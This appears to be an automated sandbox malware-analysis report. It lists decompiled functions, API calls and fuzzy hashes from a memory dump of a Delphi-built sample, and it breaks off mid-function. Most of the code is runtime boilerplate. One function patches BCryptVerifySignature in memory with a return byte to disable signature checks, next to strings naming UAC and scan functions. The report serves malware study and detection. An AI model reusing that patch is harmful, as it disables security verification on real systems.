Software\Borland\Locales, xrefs: 032A5AC0, 032A5ADE

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
Instruction ID: c61769eb5f4f9e03b8ec0e47a4830028017ad38ab94d315518f25b3d1bcbb0ea
Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
Instruction Fuzzy Hash: 0431A475E50A2D2BEB25D6BCCC45BDFB6AD4B05380F0401E2D644E6185D6B4EEC88B50

Uniqueness

Uniqueness Score: -1.00%

Function 032B7B14 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E032B7B14(void* __eax, CHAR* __ecx) {
				long _v20;
				void _v24;
				intOrPtr _v36;
				void* _t7;
				long _t10;
				WCHAR* _t13;
				CHAR* _t17;
				struct HINSTANCE__* _t18;
				void* _t19;

				_t17 = __ecx;
				_t19 = __eax;
				_v24 = 0xc3;
				_t10 = 0;
				_t18 = LoadLibraryW(_t13);
				if(_t18 > 0) {
					_t7 = GetProcAddress(_t18, _t17);
					if(_t7 != 0) {
						NtWriteVirtualMemory(_t19, _t7,  &_v24, 1,  &_v20);
						if(_v36 > 0) {
							_t10 = 1;
						}
					}
					FreeLibrary(_t18);
				}
				return _t10;
			}

0x032b7b1b
0x032b7b1d
0x032b7b1f
0x032b7b23
0x032b7b2b
0x032b7b2f
0x032b7b33
0x032b7b3a
0x032b7b4a
0x032b7b54
0x032b7b56
0x032b7b56
0x032b7b54
0x032b7b59
0x032b7b59
0x032b7b66

APIs

LoadLibraryW.KERNEL32(bcrypt,032B9F4C,Initialize,032DE35C,032B9F4C,UacScan,032DE35C,032B9F4C,UacInitialize,032DE35C,032B9F4C,00000000,032DE3D8,ScanString,032DE35C,032B9F4C), ref: 032B7B26
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 032B7B33
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,032B9F4C,Initialize,032DE35C,032B9F4C,UacScan,032DE35C,032B9F4C,UacInitialize), ref: 032B7B4A
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,032B9F4C,Initialize,032DE35C,032B9F4C,UacScan,032DE35C,032B9F4C,UacInitialize,032DE35C,032B9F4C,00000000,032DE3D8), ref: 032B7B59

Strings

bcrypt, xrefs: 032B7B25
BCryptVerifySignature, xrefs: 032B7B31

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 923a967787751e240ebbd6fd4fa39d26f7f32154ba0ff206837c286df80b68bd
Instruction ID: 7b53acdb78fc3aed8c4ecca8371f12e7a5aa4cef70a7a8b1b4fa1b9b607c291c
Opcode Fuzzy Hash: 923a967787751e240ebbd6fd4fa39d26f7f32154ba0ff206837c286df80b68bd
Instruction Fuzzy Hash: 9EF0B4351157553FD220A12C5C40EBF67ACCFC27A0F08462DB9649A180DBA1888582B1

Uniqueness

Uniqueness Score: -1.00%

Function 032BCB04 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E032BCB04(char __eax, void* __ebx, char __edx, void* __esi) {
				char _v8;
				char _v12;
				void* _v16;
				char _v24;
				void* _v32;
				void* _v56;
				intOrPtr _t52;
				char _t54;
				void* _t58;

				_v12 = __edx;
				_v8 = __eax;
				E032A4954(_v8);
				E032A4EE4( &_v12);
				_push(_t58);
				_push(0x32bcbd6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t58 + 0xffffffcc;
				_push(0);
				_push(0);
				_push( &_v24);
				_push(E032A4DB4(_v12));
				L032BCA44();
				E032BCA4C( &_v56, 0x40,  &_v24, 0, 0, 0);
				NtCreateFile( &_v16, 0x100002,  &_v56,  &_v32, 0, 0, 1, 2, 0x20, 0, 0);
				_t54 = _v8;
				if(_t54 != 0) {
					_t54 =  *((intOrPtr*)(_t54 - 4));
				}
				_push(0);
				_push(0);
				_push(_t54);
				_push(E032A49BC( &_v8));
				_push( &_v32);
				_push(0);
				_push(0);
				_push(0);
				_push(_v16);
				L032B7D30();
				NtClose(_v16);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x32bcbdd);
				E032A4C24( &_v12);
				return E032A44A0( &_v8);
			}

0x032bcb0c
0x032bcb0f
0x032bcb15
0x032bcb1d
0x032bcb24
0x032bcb25
0x032bcb2a
0x032bcb2d
0x032bcb32
0x032bcb34
0x032bcb39
0x032bcb42
0x032bcb43
0x032bcb59
0x032bcb7d
0x032bcb82
0x032bcb87
0x032bcb8c
0x032bcb8c
0x032bcb8e
0x032bcb90
0x032bcb92
0x032bcb9b
0x032bcb9f
0x032bcba0
0x032bcba2
0x032bcba4
0x032bcba9
0x032bcbaa
0x032bcbb3
0x032bcbba
0x032bcbbd
0x032bcbc0
0x032bcbc8
0x032bcbd5

APIs

Part of subcall function 032A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 032A4EF2

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,032BCBD6), ref: 032BCB43
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 032BCB7D
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 032BCBAA
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 032BCBB3

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 16f9fe34452a7bb540f5a4b776a868b79bcb9374462c7cc532f02714fe5ee074
Instruction ID: 8c602f15388a52f90b458e223bb759ce65f8cc5755aa13e24648f1b8b57cdbd1
Opcode Fuzzy Hash: 16f9fe34452a7bb540f5a4b776a868b79bcb9374462c7cc532f02714fe5ee074
Instruction Fuzzy Hash: 6621EC75A90719BBEB10EAA4CC42FDEB7BCAF04B50F614461B600BA1C0D7F0AE4486A4

Uniqueness

Uniqueness Score: -1.00%

Function 032BCA74 Relevance: 4.5, APIs: 3, Instructions: 45
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E032BCA74(short __eax, void* __ebx) {
				short _v8;
				void* _v16;
				void* _v40;
				intOrPtr _t33;
				void* _t36;

				_v8 = __eax;
				E032A4EE4( &_v8);
				_push(_t36);
				_push(0x32bcaee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36 + 0xffffffdc;
				RtlInitUnicodeString( &_v16,  &_v8);
				_push(0);
				_push(0);
				_push( &_v16);
				_push(E032A4DB4(_v8));
				L032BCA44();
				E032BCA4C( &_v40, 0x40,  &_v16, 0, 0, 0);
				NtDeleteFile( &_v40);
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x32bcaf5);
				return E032A4C24( &_v8);
			}

0x032bca7b
0x032bca81
0x032bca88
0x032bca89
0x032bca8e
0x032bca91
0x032bca9c
0x032bcaa1
0x032bcaa3
0x032bcaa8
0x032bcab1
0x032bcab2
0x032bcac8
0x032bcad1
0x032bcada
0x032bcadd
0x032bcae0
0x032bcaed

APIs

Part of subcall function 032A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 032A4EF2

RtlInitUnicodeString.N(?,?,00000000,032BCAEE), ref: 032BCA9C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,032BCAEE), ref: 032BCAB2
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,032BCAEE), ref: 032BCAD1

Part of subcall function 032A4C24: SysFreeString.OLEAUT32(032BD70C), ref: 032A4C32

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: 71bd10f958f2610efe6a027f2e0bf59dc36f9e6edfd8b71cbd02f59a262d88c5
Instruction ID: 359a3fd8afbc277e2e1736d4e2c57736927cf551ce4dd6d85ad5f30da81ac27d
Opcode Fuzzy Hash: 71bd10f958f2610efe6a027f2e0bf59dc36f9e6edfd8b71cbd02f59a262d88c5
Instruction Fuzzy Hash: 0801E175910708FFDB01EAA4CD52FCDB7FCEB48704F614461A604E6580EBB4AB449664

Uniqueness

Uniqueness Score: -1.00%

Function 032A7FB8 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E032A7FB8(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E032A539C(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E032A539C(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

0x032a7fbf
0x032a7fc4
0x032a7fc6
0x032a7fc6
0x032a7fd9
0x032a7fe8
0x032a7feb
0x032a7ff8
0x032a7ffb
0x032a8000
0x032a8003
0x032a8005
0x032a8012
0x032a8015
0x032a801a
0x032a801d
0x032a801f
0x032a8028

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 032A7FD9

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: ed347db4d50467898ada69b8a2b4b872e73a591fc986ed0462a5f8caf8e303b1
Instruction ID: 5814bc5da1a7835efefccec9438aa31da490ee35d5bbcb9d983c7a063627adf8
Opcode Fuzzy Hash: ed347db4d50467898ada69b8a2b4b872e73a591fc986ed0462a5f8caf8e303b1
Instruction Fuzzy Hash: 81111EB5E00609AFDB40CF9DC880DAFF7F9EFC8300B14C569A408EB250E6719A418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 032AA7A8 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E032AA7A8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E032A44F4(_t10, _t18);
				}
				return E032A4590(_t10, _t5 - 1,  &_v260, _t19);
			}

0x032aa7b3
0x032aa7b5
0x032aa7c6
0x032aa7cb
0x032aa7cd
0x00000000
0x032aa7e5
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032AA7C6

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: c5002ac666217e3fc8018e8c2be572dce496c21dd53c59d62ff8594365e5cde6
Instruction ID: e67d04fd0c7ae27cb3731cbfc681bc9996649bc37cc2ec3ddd4a04690ed282d8
Opcode Fuzzy Hash: c5002ac666217e3fc8018e8c2be572dce496c21dd53c59d62ff8594365e5cde6
Instruction Fuzzy Hash: 65E0923572061417D310E56D5C859EA735C9B68711F04426AAD15CF341EEF09DC086A4

Uniqueness

Uniqueness Score: -1.00%

Function 032AB770 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E032AB770() {
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _t7;
				struct _OSVERSIONINFOA* _t18;

				_t18->dwOSVersionInfoSize = 0x94;
				_t7 = GetVersionExA(_t18);
				if(_t7 != 0) {
					 *0x32c97c0 = _v132;
					 *0x32c97c4 = _v144;
					 *0x32c97c8 = _v140;
					if( *0x32c97c0 != 1) {
						 *0x32c97cc = _v136;
					} else {
						 *0x32c97cc = _v136 & 0x0000ffff;
					}
					return E032A4710(0x32c97d0, 0x80,  &_v128);
				}
				return _t7;
			}

0x032ab776
0x032ab77e
0x032ab785
0x032ab78b
0x032ab794
0x032ab79d
0x032ab7a9
0x032ab7bf
0x032ab7ab
0x032ab7b4
0x032ab7b4
0x00000000
0x032ab7d2
0x032ab7dd

APIs

GetVersionExA.KERNEL32(?,032C8106,00000000,032C811E), ref: 032AB77E

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 736448c38a7d48df40a7c1e33ac41e201daecb63eb7c5e650ba05503865584df
Instruction ID: f19de6a6909eb285ff95ac38c2bfe218efac9b073a12f0ccf505d0657fff9b4c
Opcode Fuzzy Hash: 736448c38a7d48df40a7c1e33ac41e201daecb63eb7c5e650ba05503865584df
Instruction Fuzzy Hash: 71F017B9525B428FE750EF2CE848A1577E0FB48B01F08892CE898C7384E7748488CF52

Uniqueness

Uniqueness Score: -1.00%

Function 032AA7F4 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E032AA7F4(int __eax, signed int __ecx, int __edx) {
				char _v16;
				signed int _t5;
				signed int _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16 & 0x000000ff;
				}
				return _t5;
			}

0x032aa7f7
0x032aa7f8
0x032aa80e
0x032aa816
0x032aa810
0x032aa810
0x032aa810
0x032aa81c

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,032ABE56,00000000,032AC06F,?,?,00000000,00000000), ref: 032AA807

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7e8920f8d0d2d0f23a6a7b610fcb7e2c8d9d986827befababdb0fca97cc2ae55
Instruction ID: 0014bcd7c0ae7a2dffc16ed126113cc73cbbd61c61929101c072ec5d4144c5eb
Opcode Fuzzy Hash: 7e8920f8d0d2d0f23a6a7b610fcb7e2c8d9d986827befababdb0fca97cc2ae55
Instruction Fuzzy Hash: 48D05E6632D6602FE210915E2E84D7B9ADCCEC67A1F04807AB698CB100E2408C4A93B1

Uniqueness

Uniqueness Score: -1.00%

Function 032A91F0 Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E032A91F0() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}

0x032a91f4
0x032a9200

APIs

GetLocalTime.KERNEL32 ref: 032A91F4

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: f4f18dacdc05837cd8c7ce478f2f875bfbac66a52ed17a04de46c01d51863990
Instruction ID: 50e5ea04042f46d4e85f33a9cf637111e77d3335cf1c6871af429ca6b2c09dd8
Opcode Fuzzy Hash: f4f18dacdc05837cd8c7ce478f2f875bfbac66a52ed17a04de46c01d51863990
Instruction Fuzzy Hash: 63A01208405C20078140331C0C0217830405801A20FCC078468F8542D0EA1D01604193

Uniqueness

Uniqueness Score: -1.00%

Function 032A20C4 Relevance: .1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			E032A20C4(void* __eax, char* __edx) {
				char* _t103;

				_t103 = __edx;
				_t39 = __eax + 1;
				 *__edx = 0xffffffff89705f71;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
				_t37 = _t103 + 1; // 0x1
				return _t37;
			}

0x032a20c5
0x032a20c7
0x032a20e9
0x032a20f0
0x032a2101
0x032a210c
0x032a211d
0x032a2128
0x032a2139
0x032a2144
0x032a2155
0x032a2160
0x032a2171
0x032a217c
0x032a218d
0x032a2198
0x032a21a9
0x032a21b4
0x032a21c5
0x032a21cd
0x032a21d6
0x032a21d8
0x032a21dc

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 032AD278 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E032AD278() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x32de22c = E032AD24C("VariantChangeTypeEx", E032ACDE4, _t91);
				 *0x32de230 = E032AD24C("VarNeg", E032ACE14, _t91);
				 *0x32de234 = E032AD24C("VarNot", E032ACE14, _t91);
				 *0x32de238 = E032AD24C("VarAdd", E032ACE20, _t91);
				 *0x32de23c = E032AD24C("VarSub", E032ACE20, _t91);
				 *0x32de240 = E032AD24C("VarMul", E032ACE20, _t91);
				 *0x32de244 = E032AD24C("VarDiv", E032ACE20, _t91);
				 *0x32de248 = E032AD24C("VarIdiv", E032ACE20, _t91);
				 *0x32de24c = E032AD24C("VarMod", E032ACE20, _t91);
				 *0x32de250 = E032AD24C("VarAnd", E032ACE20, _t91);
				 *0x32de254 = E032AD24C("VarOr", E032ACE20, _t91);
				 *0x32de258 = E032AD24C("VarXor", E032ACE20, _t91);
				 *0x32de25c = E032AD24C("VarCmp", E032ACE2C, _t91);
				 *0x32de260 = E032AD24C("VarI4FromStr", E032ACE38, _t91);
				 *0x32de264 = E032AD24C("VarR4FromStr", E032ACEA4, _t91);
				 *0x32de268 = E032AD24C("VarR8FromStr", E032ACF10, _t91);
				 *0x32de26c = E032AD24C("VarDateFromStr", E032ACF7C, _t91);
				 *0x32de270 = E032AD24C("VarCyFromStr", E032ACFE8, _t91);
				 *0x32de274 = E032AD24C("VarBoolFromStr", E032AD054, _t91);
				 *0x32de278 = E032AD24C("VarBstrFromCy", E032AD0D4, _t91);
				 *0x32de27c = E032AD24C("VarBstrFromDate", E032AD144, _t91);
				_t46 = E032AD24C("VarBstrFromBool", E032AD1B8, _t91);
				 *0x32de280 = _t46;
				return _t46;
			}

0x032ad286
0x032ad29a
0x032ad2b0
0x032ad2c6
0x032ad2dc
0x032ad2f2
0x032ad308
0x032ad31e
0x032ad334
0x032ad34a
0x032ad360
0x032ad376
0x032ad38c
0x032ad3a2
0x032ad3b8
0x032ad3ce
0x032ad3e4
0x032ad3fa
0x032ad410
0x032ad426
0x032ad43c
0x032ad452
0x032ad462
0x032ad468
0x032ad46f

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 032AD281

Part of subcall function 032AD24C: GetProcAddress.KERNEL32(00000000), ref: 032AD265

Strings

VarDateFromStr, xrefs: 032AD3EF
VarAdd, xrefs: 032AD2D1
VarSub, xrefs: 032AD2E7
VarNot, xrefs: 032AD2BB
VarI4FromStr, xrefs: 032AD3AD
VarMul, xrefs: 032AD2FD
VarBoolFromStr, xrefs: 032AD41B
VarOr, xrefs: 032AD36B
VariantChangeTypeEx, xrefs: 032AD28F
VarIdiv, xrefs: 032AD329
VarBstrFromCy, xrefs: 032AD431
VarMod, xrefs: 032AD33F
VarAnd, xrefs: 032AD355
VarR4FromStr, xrefs: 032AD3C3
VarCyFromStr, xrefs: 032AD405
VarNeg, xrefs: 032AD2A5
VarCmp, xrefs: 032AD397
VarDiv, xrefs: 032AD313
VarXor, xrefs: 032AD381
VarBstrFromDate, xrefs: 032AD447
VarR8FromStr, xrefs: 032AD3D9
VarBstrFromBool, xrefs: 032AD45D
oleaut32.dll, xrefs: 032AD27C

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: b4a55f9f69b6e46cc63a6c7a5e2dc7bc2c135b28acc43d80ab8cdf44c81edad9
Instruction ID: 574fdef292425d9830299a0bf41446abd79a58c51ac8d04398a49dc7805b2e24
Opcode Fuzzy Hash: b4a55f9f69b6e46cc63a6c7a5e2dc7bc2c135b28acc43d80ab8cdf44c81edad9
Instruction Fuzzy Hash: A34114A5A3AF0C5B5608FB6D7528427B7D9D6C4710360802AB808CFF59DF60BCD1DAA9

Uniqueness

Uniqueness Score: -1.00%

Function 032A2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E032A2530(void* __eax, void* __fp0) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t197;
				void* _t198;
				void* _t211;

				_push(__eax);
				_t73 = 0x27;
				goto L1;
				L12:
				while(_t180 != 0x32db708) {
					_t79 = E032A2048(_t180);
					_t131 = _t79;
					__eflags = _t131;
					if(_t131 == 0) {
						L11:
						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L4;
					}
